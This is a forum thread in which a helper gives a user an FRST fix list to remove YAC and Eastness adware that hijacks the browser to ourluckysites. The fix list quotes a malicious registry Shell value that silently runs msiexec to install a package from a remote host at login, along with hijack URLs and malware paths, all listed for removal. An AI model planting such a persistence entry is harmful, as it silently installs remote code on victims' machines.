Windows 10 - redirects through luckystarting

Karnado 01 May 2017 18:15 489 4
  • Helpful post
    #2 01 May 2017 18:26
    Kolobos
    Computer specialist

    Uninstall:
    YAC(Yet Another Cleaner!)
    AlphaGo

    Next to frst.exe, create a file Fixlist.txt with the following contents:
    CloseProcesses:
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {0550858A-48A7-48DE-A0D5-9BB75EB66F30} - \User_Feed_Synchronization-{C6561E84-BBD4-4E59-87C2-88A316C82987} -> Brak pliku <==== UWAGA
    Task: {05B1FF16-B339-4B89-88E4-1339085D5027} - \Windows-PG -> Brak pliku <==== UWAGA
    Task: {07F8D792-997D-484E-9C36-AC1D635C123C} - \T0528 -> Brak pliku <==== UWAGA
    Task: {165BD13B-3468-44DF-801D-DDB3327C9658} - \PCDEventLauncherTask -> Brak pliku <==== UWAGA
    Task: {21C3BFE0-48F4-438E-BA94-1BD99A0F6687} - \{B7461C0C-472E-4C8B-98A1-B66738525845} -> Brak pliku <==== UWAGA
    Task: {250AA2AC-EAE6-4D6B-B9CF-701FECFC517B} - \Dell SupportAssistAgent AutoUpdate -> Brak pliku <==== UWAGA
    Task: {26341F56-0924-4B25-B4E7-F3E4F75BC81F} - \CLVDLauncher -> Brak pliku <==== UWAGA
    Task: {4485F537-A4B5-41A1-A329-CC344431D6E3} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA
    Task: {46709934-6B33-460A-88ED-BE0E474228BD} - \{931EFBC0-146E-485F-AAA7-792078CCB47C} -> Brak pliku <==== UWAGA
    Task: {55078EAE-708F-4C4F-AE83-84213329A103} - \CLMLSvc_P2G8 -> Brak pliku <==== UWAGA
    Task: {62D8C594-2FED-4A0C-AF9E-14C06229F02D} - \DropboxUpdateTaskMachineCore -> Brak pliku <==== UWAGA
    Task: {691EA1C9-20DD-46C0-BDC7-B69CC624EE86} - \RtHDVBg_PushButton -> Brak pliku <==== UWAGA
    Task: {932AF510-13F6-42F2-A578-B2B3D33F6999} - \HPCeeScheduleForWojtek -> Brak pliku <==== UWAGA
    Task: {98076C22-E319-4FD4-9399-0602FBDA07B8} - \BundleApplicationRepairToolLauncherTask -> Brak pliku <==== UWAGA
    Task: {986575EF-4A1A-444B-978A-8D595CABF6C9} - \OneDrive Standalone Update Task v2 -> Brak pliku <==== UWAGA
    Task: {9F945944-631E-4DA4-8301-9EF51834629A} - \PCDDataUploadTask -> Brak pliku <==== UWAGA
    Task: {B9EDCC18-D8C3-4500-BE7E-C6711E6374FC} - \GoogleUpdateTaskMachineUA -> Brak pliku <==== UWAGA
    Task: {CB4562E8-3C8D-488A-99CB-9DEAE6F33D9D} - \{EE5FCAB3-6EE5-4539-BA44-A6413E340262} -> Brak pliku <==== UWAGA
    Task: {E43545F7-D361-494E-B8DE-8B828ED22811} - \Milimili -> Brak pliku <==== UWAGA
    Task: {E7BDF459-74AB-466F-A984-1C137E61EA5B} - \{A7FE2579-D247-4BE6-8C66-E8BA29E9A6D9} -> Brak pliku <==== UWAGA
    Task: {EF8BBBEE-3128-41AA-BCB7-D0B9BC70386A} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA
    Task: {F0307202-3500-4345-AA2B-96801826E956} - \SystemToolsDailyTest -> Brak pliku <==== UWAGA
    Task: {F359CA0A-3369-4317-80C0-A71CE8DA6DF7} - \GoogleUpdateTaskMachineCore -> Brak pliku <==== UWAGA
    Task: {F7E8E267-D8D7-4B94-B742-08831A8C126D} - \DropboxUpdateTaskMachineUA -> Brak pliku <==== UWAGA
    Task: {FE87B222-13DB-4211-B4F6-E82D8AC64E41} - \PCDoctorBackgroundMonitorTask -> Brak pliku <==== UWAGA




    Shortcut: C:\Users\Wojtek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Wojtek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    ShortcutWithArgument: C:\Users\Wojtek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    2017-04-21 23:19 - 2016-05-23 04:37 - 00065696 ____N () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QNdY4FThXNkRYMWZXFjH5RjzXRWRLN8NLFTIdRWEcRq== /q
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\...\MountPoints2: {514161e2-c3d8-11e6-bc4d-a0d37a8bf2b7} - "F:\noautorun.exe"
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    GroupPolicyScripts: Ograniczenia <======= UWAGA
    GroupPolicyScripts-x32: Ograniczenia <======= UWAGA
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-747925333-1029383313-1720164980-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-747925333-1029383313-1720164980-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    Edge HomeButtonPage: HKU\S-1-5-21-747925333-1029383313-1720164980-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492629423&z=a5bb36283e602cc04660f21g6zdt7obqcodt9z9oeo&from=che0812&uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
    R2 Kitty; C:\Users\Wojtek\AppData\Local\Kitty\Kitty.dll [257024 2017-04-28] (kitty) [Brak podpisu cyfrowego] <==== UWAGA
    R2 SNARE; C:\Users\Wojtek\AppData\Local\SNARE\Snare.dll [802816 2017-04-24] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    S2 3DM; C:\Users\Wojtek\AppData\Local\3DM\Kitty.dll [X]
    S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] <==== UWAGA
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA
    2017-05-01 16:37 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
    2017-04-27 12:37 - 2017-04-28 19:36 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-21 23:19 - 2017-04-21 23:19 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-21 23:19 - 2017-04-21 23:19 - 00000000 ____D C:\Users\Wojtek\AppData\Roaming\Elex-tech
    2017-04-21 23:19 - 2017-04-21 23:19 - 00000000 ____D C:\Program Files (x86)\Elex-tech
    2017-04-21 23:18 - 2017-04-28 19:34 - 00000000 ____D C:\Program Files (x86)\AlphaGo
    2017-04-20 11:20 - 2017-04-28 19:35 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-20 11:20 - 2017-04-28 19:35 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-19 21:16 - 2017-04-27 13:09 - 00000000 ____D C:\Users\Wojtek\AppData\Local\3DM
    2017-04-19 20:15 - 2017-04-19 20:15 - 00000000 ____D C:\Program Files (x86)\MK
    2017-04-18 14:17 - 2017-04-28 19:35 - 00000000 ____D C:\Users\Wojtek\AppData\LocalLow\Mozilla
    2017-04-18 14:17 - 2017-04-18 14:17 - 00000000 ____D C:\Users\Wojtek\AppData\Local\Eastness
    2017-04-18 14:16 - 2017-05-01 16:11 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-18 14:16 - 2017-05-01 13:49 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-18 14:16 - 2017-04-28 19:34 - 00000000 ____D C:\Users\Wojtek\AppData\Roaming\WinSAPSvc
    2017-04-18 14:16 - 2017-04-21 23:18 - 00000000 ____D C:\Users\Wojtek\AppData\Local\Kitty
    2017-04-18 14:16 - 2017-04-18 14:16 - 00000000 ____D C:\Users\Wojtek\AppData\Local\Firefox
    2017-04-18 14:16 - 2017-04-18 14:16 - 00000000 ____D C:\ProgramData\Software
    2017-04-18 14:16 - 2017-04-18 14:16 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-18 14:16 - 2017-04-18 14:16 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-18 14:15 - 2017-04-25 14:37 - 00000000 ____D C:\Users\Wojtek\AppData\Local\SNARE
    2017-04-18 14:11 - 2017-04-27 13:28 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-05-01 16:38 - 2016-07-16 16:11 - 00000000 ____D C:\ProgramData\McAfee
    2017-05-01 16:38 - 2016-07-16 16:11 - 00000000 ____D C:\Program Files (x86)\McAfee
    EmptyTemp:

    In FRST, select Napraw (Fix).

    Once it has run, post new FRST logs from a scan.

    0
  • #3 01 May 2017 19:29
    Karnado
    Level 2

    I did as you instructed; the attachments are below. However, in the meantime the antivirus performed a restart, and when I tried to remove YAC through Add or Remove Programs, there was a message that it is no longer in that location, so I suspect that was its doing?

    0
  • Helpful post
    #4 01 May 2017 19:34
    Kolobos
    Computer specialist

    Delete the C:\FRST directory and that's all.

    YAC has already been removed by FRST.

    0
  • #5 01 May 2017 19:39
    Karnado
    Level 2

    So far everything is OK. Many thanks for the help : )

    0